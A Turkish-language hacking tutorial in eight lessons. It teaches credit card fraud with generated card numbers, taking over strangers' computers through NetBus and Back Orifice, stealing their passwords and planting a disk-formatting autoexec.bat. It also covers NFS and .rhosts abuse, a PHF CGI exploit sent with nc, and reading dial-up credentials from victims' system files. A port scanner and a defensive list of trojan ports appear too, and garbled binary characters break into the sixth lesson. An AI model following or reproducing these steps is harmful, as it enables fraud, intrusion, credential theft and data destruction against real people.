DERS 1

Hacking Nedir ?

Hacking, bilgisayar sistemi hakkinda ve sistemin nasil calistigi hakkinda bilgi almak icin bu sistemlere girmektir. Hacking kanunsuz bir olay cunku hackerlar Her Tur bilgiye karsiliksiz, birsey odemeden ulaşmak istiyorlar, ve ulaşiyorlarda! Tabii bu insanlari kizdiriyor ve toplumdan dişlaniyorlar. Ve Hapisten uzak durmak icinde kimliklerini gizlemek zorundalar.Kendi hacking topluluklari dişindan bir kimseyle cezalandirilma korkusundan konuşamazlar.Ogrenmek istedikleri icin cezalandiriliyorlar. Hukumetler, dişarda o kadar tehlikeli insan varken, bu hackerlari yakalamak icin tonlarca para harciyor. Katiller, tecavuzculer, teroristler, Fidyeciler ve hirsizlar yaptiklari işler yuzunden cezalandirilmali, Hackerlar degil! Kimseyi tehdit etmezler, ve bir insani veya bir bilgisayari incitmek istemezler. Elbetteki kendilerine hacker deyip bilgisayar sistemlerine zarar verenlerde var, ama onlar hacker deil. Onlar Suclular. Hackerlardan kurtulmanin iki yolu var. Biri bilgisayar ve telefon olayini iptal etmek ki onlar yine istediklerini almak icin bir yol bulabilirler! diger yol ise onlara istediklerini vermek. Tum bilgiye bedava erişim.

Niye hacking?

Daha once bahsettigimiz gibi, sistemler ve sistemlerin nasil calistigi hakkinda bilgi sahibi olmak icin! Amaclari sisteme zarar vermek degil.Eger bir sisteme zarar verirlerse yakalanirlar. Ama zarar vermezlerse farkedilmeden rahatca islerini görebilirler. Yeni başliyanlar oncelikle hackingle ilgili ellerine gecen herseyi okumalilar. Sacma ve sIkIcI gelebilir ama gelecekte yararini goreceklerdir. Hacking hakkinda Ne kadar cok okursaniz yakalanma şansinizda o kadar az olur. Okudugunuz ufacik degersiz bir bilgi bazen en cok isinize yarayan sey olabilir. Bu yuzden mumkun oldugunca cok okumalisiniz.

Hacking kurallari

Asla bir sisteme zarar vermeyin. Bu sadece size sorun olacaktir. Sistemdeki dosyalarin hicbirini degistirmeyin . Sadece farkedilmenizi sagliyabilecek dosyalari ve o bilgisayara gelecekte girebilmenizi sagliyacak dosyalari degiştirin. Guvenmediginiz insanlarla hacking projeleriniz hakkinda konuşmayin. BBS lerde yazdiklariniza dikat edin, BBS`ler kanun gucleri tarafindan izlenebilir.(En azindan BSA eheh) Mesaj atarken,kimsenin gercek ismi ve telefon numarasini kullanmayin. Hack ettiginiz sistemlerde isminizi veya lakabinizi birakmayin. Hukumet bilgisayarlarini hack ETMEYIN! Hacking hakkindaki goruşmeleriniz ev telefonunuzdan yapmayin. (Abarti gibi dimi. eheh. ama amerikada falan FBI`in direk ugrastigini dusunursek!) Paranoyak olun. Hackingle ilgili tum malzemenizi guvenli bir yerde tutun. Gercek bir hacker olmak icin hack etmeniz lazim.Hemen ilk hack işleminize başlayin...

Baslangic

Ilk yapmaniz gereken pkunzip veya baska bir dekompres programi edinmek.Internetten veya BBS`lerden download ettiginiz dosyalarin hemen hemen hepsi zip`lidir. Zip`li dosya sIkIştIrIlmIş dosya anlamindadir. Zip`li dosyalarin uzantisi ".zip" dir. Sonra kendinize iyi bir War Dialer (modem bulucu denebilir) bulmaniz gerekiyor. Bu program verdiginiz numara sinirlai icindeki telefon numaralarini arayarak, modem olup olmadigini kontrol eder. Bulduklarini bir dosyaya kaydeder. Bir cok tarayici var ama ben Autoscan ve A-Dial i tavsiye ederim. Bunlarin hem kullanimi kolay hemde islemi cabuk ve saglam yapiyorlar

Hacking`e nereden ve nasil baslamali?

Kendinize iyi bir tarayici bulduktan sonra ve bunu kullanip bir numara buldugunuzda. Terminal programinizdan buldugunuz numarayi arayin. Karsi bilgisayara baglandiginizi belirten birtakim sesler duyacaksiniz. Sonra "CONNECT 14400" gibi baglanti hizinizi ve baglandiginiz sistemin adini goruceksiniz. Eger "CONNECT #" yazisindan sonra hicbirsey olmazsa bir kac kez enter a basin. Eger acayip karakterler geliyorsa, parity, data bits, stop bits, baud rate, Flow Control ayarlarinizi gozden gecirin.. Bu bir bilgisayar sitemine baglanmanin bir yolu. Bir baska yoluda internet dial-up ile baglanmak. Dial-Up ile baglandiginizda, eger shell`e (prompt`a : feza> gibi) dusmenize izin varsa shell`e gecin. Shell`e gectiginizde hangi sistemde oldugunuza bakin. (UNIX, VAX/VMS, PRIME vs.) Bu sistemler icin basit bilgi asagida verilecektir.. Eger shell`e dusmenize izin yoksa, direk ppp veya slip baglantisini baslatiyorsa, bu sisteme bazi programlarla (telnet,ftp) girin. Mesela Win95`de Start menusunde run`a telnet yazin. Ftp programi olarakda Reachout Software`in SuperFxp sini tavsiye ederim. Eger telnet veya ftp yapabilceginiz makinenin ismini veya ip`sini bilmiyorsaniz, Whatsup (www.ipswitch.com) veya Netscan kullanin. Ben whatsup`i kullaniyorum. Onda Tools menusunden Import`a girip Scan IP yapin. Boylece o networkdeki tum makinalari gorebilirsiniz.

DERS 2

Beles 300 MB + Domain

$u siralarda internette çok popüler olan domain,server... olayini anlatacagim.Eger internette yogun olarak

warez,hack,adult tipi sitelere ugramakta iseniz,sizde bu i$i merak ediyorsunuz demektir.Bu yazidan sonra

eminim ki merakiniz büyük ölçüde azalacaktir.Warez,hack,adult tipi siteler a$iri derecede server ihtiyaci

duyarlar.Yani bulunduklari server ne kadar büyük olursa o kadar daha fazla program,resim... gibi $eyler

koyarak hit almak amacindadirlar.Günümüzde de domain,server... denen $eylerin fiyatlari ortada.

$imdi siz diyeceksiniz : "Domain server gibi $eyler pahali diyorsun fakat ortalik domainden geçilmiyor.Önüne

gelen domain,server falan almi$ bu i$ nasil oluyor?".İ$te bizim esas konumuz da budur.Bu adamlar serverlari

nasil aliyorlar?Para mi veriyorlar?Yoksa ba$ka bir yol mu var?

1) Yukarida anlattigim olay her domain almi$ ki$i için geçerli degildir.Yani kendi parasiyla warez serveri ya da

domain almi$ ki$iler vardir.

2) A$agida anlatacagiım olayi denemeniz halinde ba$iniza gelebileceklerin mesuliyeti tamamen size aittir.

3) 2.$iktan korkup da yaziyi okumaktan vazgeçmeyin.Çünkü a$agida bu olayi en güvenli $ekilde nasil

yapilabildigini de anlattim.

4) Bedava domain ve küçük bir server veren yer istiyorsanız www.webjump.com ya da www.hypermart.net

adresinden alabilirsiniz.Büyük bir server istiyorsaniz a$agidaki yaziyi okuyunuz.

Eveettt.Artik heyecanla beklenen an geldi.Fakat hack olayindan önce tedbirlerimizi almaliyiz degil mi?:))

İlk olarak analog bir hattan baglanmaya çali$in.Isp nizi arayarak isp'nizin analog hat telefon numarasini

sorabilirsiniz.Daha sonra browser'inizda proxy ayarlarinizi yapin.Avrupa'da bulunan bir proxy'yi kulllanmakta

yarar var.Bütün bunlari yaptiktan sonra bir sahte kredi karti accsi bulmaya geldi sira.Elinize babanizin veya

annenizin kredi kartini alin.Sahte kredi kartı programinizi çali$tirin.Bu programlari nette heryerde

bulabilirsiniz.Eger hiç görmedim diyorsaniz,yazinin burdan sonrasini okumayiniz.Sahte Kredi Karti

programindan extrapolate tu$una basin ve önünüze gelen bo$ kutucuga sahip oldugunuz kredi kartinizin

numarasini yazin.Daha sonra önünüze gelen rakamlardan rastgele not edin.Bu arada kendi esas kredi

kartinizin son kullanma tarihini de not edin.Buraya kadar ba$ariyla geldiyseniz i$lemin birinci bölümü

bitmi$ demektir.Hadi geçmi$ olsun.

Internette bir sürü parayla domain,server... satan yerler vardir.İ$te bu adreslerden gazlamasi kolay olan

bir adres verecegim : www.hostingdeals.com.Bu verdigim adres gerçekten çok gaz bir yerdir.

Yani 300 MB'lik bir alani kolay bir $ekilde elde edebilirsiniz.İlla benim size verdigim bu adresi kullanmak

zorunda degilsiniz tabi fakat gazlamaya bu kolay adresten ba$larsaniz ilerde daha büyük kapasiteli yerlerde

elde edebilirsiniz.Bu da sizin kabiliyetinize kalmi$ bir$ey artik.Ne demi$ler : Önce Emeklenir,Sonra

Yürünür,Sonra Ko$ulur...

Az önce verdigim adrese gidin ve sign up linkine tıklayin.Kar$iniza gelen pencereyi mantikli-sallama bilgilerle

doldurun.En önemlisi e-mail adresinizi mutlaka dogru verin.Daha sonra devam edin.Kar$iniza 1-2 pencere daha

çikacak bunlari da mantikli-sallama bilgilerle doldurun.Bu arada serverinizin yeteneklerini belirteceginiz bir

pencere gelecek buradan hepsini i$aretleyin ne de olsa bele$ server,her$eyi tastamam olsun degil mi yani...

Onemli : Fiyat Odeme $ekillerinden en sag alt kö$ede olani seçin.Sonra en önemli pencere geliyoruz : Paranin

ödenecegi yer.Isim bölümüne zaten otomatikmen ismimiz yazilir.Çünkü daha önce bu bilgiyi vermi$tik.

Kredi kart numarasi bölümüne size daha önce not etmenizi istedigim numaralardan birini yazin.Son kullanma

tarihi bölümünü de size daha önce not etmenizi istedigim son kullanma tarihini ay/yil formatinda yazarak

DERS 3

Wingate Portscan Sayesinde Bes Dakikada Bir Enayi Bulun

Iste size mükemmel bir döküman netbus portu (12345) açik olan bilgisayarlari Wingate ile scanleyip bulabilir kimseye dosya yollamadan açik portlara baglanabilirsiniz.

1.)Önce IRC ye girip herhangi birinin IP adresini alin (Status a /dns nick yazarak) sonra adamin ip numarasini wingatede Hostname or IP yazan yere yazin.

2.)Altta scan the port yazisinin yanindaki boslukta 23 yazar onu silip 12345 olarak degistirin.

3.)Sira geldi seçeneklerden Try to open i seçmeye bunuda bitirdikten sonra scan buttonuna basin.

4.)Servers found kisminda bulunan (Eger bulunmadiysa baska bir ip bulup yeniden scan yapin) ip adreslerinden herhangi birini seçip netbus i çalistirin.

5.)Netbusdaki ip bölümüne bu ip numarasini yerlestirip connect olun eger sifre istemezse yola devam .

6.)Simdi netbusla adamin bilgisayarindasiniz bogui programini kulanin.

7.)Upload etmek için Show files buttonuna basin %100 olduktan sonra upload tusuna basip boserveyi seçin sonra sorulan soruda ok deyip uploadin bitimini bekleyin.

8.)Bu islemde bitti simdi sira sifreyi çalmakta netbus' in menüsünde (netbus v1.7) bulunan start program buttonuna basin çikan yere c:\boserve.exe yazip onaylayin.

9.)Su anda adamin bilgisayarinda boserve dosyasi açildi ve Bo programi ile connect olmak için hazir durumda Bogui.exe yi çalistirip adamin ip nosunu hosta yazin.

10.)Sagtarafdaki menüden system password u seçip send deyin iste adamin bütün sifreleri karsinizda.

DERS 4

IRC' de chat yaparken netbus patch' i açik olan tüm lavuklari görün

IRC'de 12345 portu (netbus patch'in açtigi port) açik olanlanri görmek için size lazim olacak programlar ;

1.Mirc veya herhangi bir mirc script yükleyin.

2.Netdedect : bu sizin IRC programiniza plug-in gibi eklenir ve 12345 i açik olanlari gösterir.

Bu programlari temin ettikten sonra netdedect.zip dosyasini mirc i kurdugunuz klasörün içine unzipleyin.

Mirc' i açin status ekranina su komutlari sirasiyla girin ;

/load -rs NetBus.mrc =>yazin ve enter'a basin

/load -rs Net-Aliases.mrc =>yazin ve enter'a basin

/load -rs BusScan.mrc =>yazin ve enter'a basin

Bunlari her yazisinizdan sonra

Loaded script 'c:\mirc\netbus.mrc

gibi bir yaziyla karsilasirsaniz bu is oldu demektir.Simdi irc.dal.net gibi kalabalik bir servere connect olun

ve iyi bir kanal seçip kanala girin #zurna gibi.Su anda zurna kanalinda sizden sonra tüm girenlerin 12345 port

lari kontrol edilecek ve açik olanlar size özel bir pencerede bildirilecektir.

artik gerisi size kalmis netbusla connect olun ne yaparsaniz yapin. Ehuehuehu episi poku yedi.

DERS 5

Netbusla format atmak

Bu yazida yazanlar sadece bilgi amaçlidir ve kesinlikle uygulanmasi suçtur.Bir bilgisayara

zarar veren kimse hiç bir zaman hacker degildir.

Ögütler bitti simdi sira biraz seytana uymakta muahahahah (isin sakasi tabii bu)

Netbusla adama baglandiniz Show files yaparak adamin dosyalarinin gözükmesini saglayin

Simdi kendi bilgisayarinizda dos dizinine inin c:\ komutu gözükünce sirayla sunlari yapin.

c:\md cpu =>enter

c:\cd cpu =>enter

c:\cpu\ komutuna geçtiniz

c:\cpu\edit autoexec.bat =>enter

Simdi karsinizda mavi bir ekran çikar bu ekrana c:\format /autotest yazisini yazip saveleyip çikin.

Su anda c:\devilish\ klasorunuzun içinde bilgisayara hiç bir soru sormadan format atmak için hazirlanmis bir autoexec.bat dosyasi war.

Dos komutunu kapatip Netbus' a gelin adamin c:\autoexec.bat dosyasini silip sizin c:\devilish\autoexec.bat dosyasini adamin c:\ bölümüne upload edin

Simdi bilgisayara restart atin bilgisayarin açilmasi ile format yemesi bir olacaktir.

Yasasin kötülüüük muahuauaha

DERS 6

Access Almak

Bunun için eski bir yöntem kullanacagiz.Baglandigimiz serverlarin export dosyalarina ula$ip

kendimizi user olarak tanitacagiz.(bizim promptumuz hacker)

hacker:~/usr/sbin/showmount -e <adres veya ip ENTER

RPC: Program not registered.

Eger "RPC: Program not registered." satiri belirirse bilinki sistemde bu tip bir security hole

bulunmuyor ki bu oran %70 tir ba$ka bi yol deniicez demektir.Neyse biz durumun a$agidaki

gibi oldugunu farzedip devam edelim.

hacker:~/usr/sbin/showmount -e <adres veya ip> ENTER

/usr adress.com

/home

/cdrom

I$te yakaladik.Bu üstte çikanlar ula$abilecegimiz directoryler

hehehe $imdi de $unlari yazin:

hacker:~mkdir /tmp/mount ENTER

hacker:~/bin/mount -nt nfs <adres veya ip:/home /tmp/mount/ ENTER

Bu komutlarla dosyalari çekmedik : ok? Sadece sistemimize mount ettik(cd rom gibi)

devam edelim ve $imdi directory de ne var bi bakalim

hacker:~ls -sal /tmp/mount ENTER(ENT)

total 9

1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./

1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../

1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/

1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/

1 drwxrx-r-x 3 kerim 100 1024 Jul 6 13:42 kerim/

1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 zeynep/

1 -rw------- 1 root root 242 Mar 9 1997 sudoers

1 drwx------ 3 test 100 1024 Oct 8 21:05 test/

1 drwx------ 15 102 100 1024 Oct 20 18:57 coskun/

Diyelim böyle bir liste aldik.$imdi "coskun" unun home unu hack edelim :))...

hacker:~id ENT

uid=0 euid=0

hacker:~whoami ENT

root

hacker:~echo "coskun::102:2::/tmp/mount:/bin/csh" /etc/passwd ENT

(Ileri derecede bilenler için : burda /bin/csh yerine bash ta kullanabilirdik ama remote server

üstünde .bash_history diye bir dosya yaratir ve silmeyi unutursak kendimizi ele veririz)...

devam edelim :

hacker:~su - coskun ENT

hacker:~ls -lsa /tmp/mount/ ENT

total 9

1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./

1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../

1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/

1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/

1 drwxrx-r-x 3 kerim 100 1024 Jul 6 13:42 kerim/

1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 zeynep/

1 -rw------- 1 root root 242 Mar 9 1997 sudoers

1 drwx------ 3 test 100 1024 Oct 8 21:05 test/

1 drwx------ 15 coskun daemon 1024 Oct 20 18:57 coskun/

Hehehe bööölece co$kun karde$imin home directory sine sahip oluruuuz ve artik

hacker:~echo "+ +" coskun/.rhosts

hacker:~cd /

hacker:~rlogin <adres veya ip

Welcome to adres.com

SunOs ver3.02....vs

adres:~$

Bakin prompta $. Ne demek bu??? biz artik bu serverin bi useriyiiiz tebrikler :)

I$te size access en azindan user siniz (root soora biraz C++ bilgisiyle beraber)

Ama daha öncede bahsettigim gibi bu tip bir security hole ihtimali zayiftir yilmadan

denemelisiniz.

Bir ba$ka yöntem ise serverin 80. portunun açik olup olmadigina bagli olan dir ki

web sayfasi olan serverlar genelde bu portlarini açik tutarlar...

hacker:~echo "+ +" /tmp/rhosts ENT

mysite:~echo "GET /cgi-bin/phf?Qalias=x%[email protected]:/tmp/rhosts+

/root/.rhosts" | nc -v - 20 <adres veya ip 80 ENT

Yada ba$ka portlarin açik olup olmadigindan $üpheniz varsa a$agidaki prg ile bunu

ara$tirmak mümkün.PrograJ÷¿

Aaañå’÷¿ÿÿÿÿ¨ñåññå’÷¿ÿÿÿÿ¨ñå’÷¿ÿÿÿÿ¨ñå

Aññå’÷¿ÿÿÿÿ¨ñå

A’÷¿ÿÿÿÿ¨ñåññå’÷¿ÿÿÿÿ¨ñåññå’÷¿ÿÿÿÿ¨ñå

Aññåñå’÷¿ÿÿÿÿ¨ñå

for (i = 1; i < 1024; i++) {

strncpy((char *)&sa, "", sizeof sa);

sa.sin_family = AF_INET;

if (isdigit(*argv[1]))

sa.sin_addr.s_addr = inet_addr(argv[1]);

else if ((host = gethostbyname(argv[1])) != 0)

strncpy((char *)&sa.sin_addr, (char *)host-h_addr, sizeof sa.sin_addr);

else {

herror(argv[1]);

exit(2);

}

sa.sin_port = htons(i);

net = socket(AF_INET, SOCK_STREAM, 0);

if (net < 0) {

perror("\nsocket");

exit(2);

}

err = connect(net, (struct sockaddr *) &sa, sizeof sa);

if (err < 0) {

printf("%s %-5d %s\r", argv[1], i, strerror(errno));

fflush(stdout);

} else {

printf("%s %-5d accepted. \n", argv[1], i);

if (shutdown(net, 2) < 0) {

perror("\nshutdown");

exit(2);

}

close(net);

}

printf(" \r");

fflush(stdout);

return (0);

}

Bu program tcp baglanti portlarini arar ve bulur prg bittiginde tcpprobe.c diye bir file iniz

olacak!!xterm üzerinde yazip çali$tirmayin!!nedenini bende bilmiyorum ama erno larimizi

bulamiyo hehehe:)))

DERS 7

Portlar Hakkinda Bilgi

Bu dökümani sizin için çok yararli olacagini düsündügüm için yazdim çünkü eger portlarin ne ise yaradigini bilmezseniz o portlardan gelen saldirilara çaresiz kalirsiniz (insan bilmedigi seyden korkar olayi)Birçok kisi netstat ,nukenabber,Conseal Firewall gibi programlarla internetteyken birinin kendi bilgisayarina baglanmaya çalisip çalismadigi kontrol eder.Eger biri bilgisayara baglanmak isterse program adamin IP numarsini ve kullandigi portu size gösterir. Size bu programlara saldiri portlarini çogaldikça eklerseniz kimse size bisiii yapamaz.

Iste birçok Trojan programinin port numaralari fakat bu numaralar gittikçe çogaliyor sebebi trojan programlarinin çogalmasi.Ben su an aklimda olan bütün saldiri yapilabilecek portlari yazdim...

port 21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx,WinCrashport

port 23 - Tiny Telnet Server

port 25 - Kuang2, Antigen, Email Password Sender, Haebu Coceda, Shtrilitz Stealth, Terminator, WinPC, WinSpy

port 31 - Hackers Paradiseport

port 80 - Executor

port 456 - Hackers Paradise

port 555 - Ini-Killer, Phase Zero, Stealth Spy

port 666 - Satanz Backdoor

port 1001 - Silencer, WebExport

port 1011 - Doly Trojan

port 1170 - Psyber Stream Server, Voice

port 1234 - Ultors Trojan

port 1243 - Sub 7

port 1245 - VooDoo Doll

port 1349 - UDP Back Ofrice DLL

port 1492 - FTP99CMP

port 1600 - Shivka-Burka

port 1807 - SpySender

port 1981 - Shockrave

port 1999 - BackDoor

port 2001 - Trojan Cow

port 2023 - Ripper

port 2115 - Bugs

port 2140 - Deep Throat, The Invasor

port 2801 - Phineas Phucker

port 3024 - WinCrashport

port 3129 - Masters Paradise

port 3150 - Deep Throat, The Invasor

port 3700 - Portal of Doom

port 4092 - WinCrash

port 4567 - TCP File Nail 1

port 4590 - ICQTrojan

port 5000 - Sockets de Troie, Bubbel

port 5001 - Sockets de Troie

port 5321 - Firehotcker

port 5400 - Blade Runner

port 5401 - Blade Runner

port 5402 - Blade Runner

port 5569 - Robo-Hack

port 5742 - WinCrash

port 6670 - DeepThroat

port 6771 - DeepThroat

port 6969 - GateCrasher, Priority

port 7000 - Remote Grab

port 7300 - NetMonitor

port 7301 - NetMonitor

port 7306 - NetMonitor

port 7307 - NetMonitor

port 7308 - NetMonitor

port 7789 - ICKiller

port 9872 - Portal of Doom

port 9873 - Portal of Doom

port 9874 - Portal of Doom

port 9875 - Portal of Doom

port 9989 - iNi-Killer

port 10067 - Portal of Doom

port 10167 - Portal of Doom

port 10607 - Coma 1.0.9

port 11000 - Senna Spy

port 11223 - Progenic trojan

port 12223 - Hack´99 KeyLogger

port 12345 - GabanBus, NetBus

port 12346 - GabanBus, NetBus

port 12361 - Whack-a-mole

port 12362 - Whack-a-mole

port 16969 - Priority

port 20001 - Millennium

port 20034 - NetBus 2, Beta-NetBus 2.01

port 21544 - GirlFriend

port 22222 - Prosiak

port 23456 - Evil FTP, Ugly FTP

port 26274 - Delta

port 30100 - NetSphere 1.27a

port 30101 - NetSphere 1.27a

port 30102 - NetSphere 1.27a

port 31337 - Back Orifice

port 31338 - Back Orifice, DeepBO

port 31339 - NetSpy DK

port 31666 - BOWhack

port 33333 - Prosiak

port 34324 - BigGluck, TN

port 40412 - The Spy

port 40421 - Masters Paradise

port 40422 - Masters Paradise

port 40423 - Masters Paradise

port 40426 - Masters Paradise

port 47262 - Delta

port 50505 - Sockets de Troie

port 50766 - Fore

port 53001 - Remote Windows Shutdown

port 54321 - SchoolBus

port 61466 - Telecommando

port 65000 - Devil

port 69123 - ShitHeep

Iste su an aklimda olan bir çok trojan port numarasi hepsini anti programlariniza ekleyin ve trojandan kurtulun.

NOT : Eger nukenabber kullaniyorsaniz options tan general sekmesine tiklayin ve block port scanners ve copy adress to clipboard ' i isaretleyin.Daha sonra Advanced' e girin ordan unassigned' a girin sagdaki bölüme port numarasini yazin protocol' u TCP yapin ( Aralarinda UDP port kullanan trojanlarda war ama istisnalar kaydeyi bozmaz) daha sonra Add/modify port a tiklayin ve böylece o porttan biri size baglanmaya çalisirsa IP numarasini görürsünüz bence bütün portlari ekleyin ve kesin güvenlik saglayin.

DERS 8

SuperOnline Sifresi Çalmanin En Kolay Yolu

Netbusla baglandiginiz birinin sifresini ele geçirmek istiyorsaniz ilk olarak adamin windows dizininde bulunan (user).pwl doasyasini download edip

PWLtoolr ile kirin ama bu yöntem üç birim çikararak giren kullanicilar için geçerli degildir(Ve uzun zahmetli bir istir)

Ben size bu Accountlari daha kolay ve kisa sürede ele geçirmek için baska yöntemlerden bahsedecem ;

Eger kurban SuperOnline'dan bagliysa c:\windows\system.dat dosyasini download edip wordpadlee açin.

Wordpadde bul Penceresine SoundConnect yazip dosya içinde aratin.

Hemen saginda yada alt satirda kurbanin username ve sifresinin yazdigini göreceksiniz.

Gerçektende kolay bir yöntem fakat sadece SuperOnline kullanicilari (SuperOnline Guide kullanicilari) için geçerlidir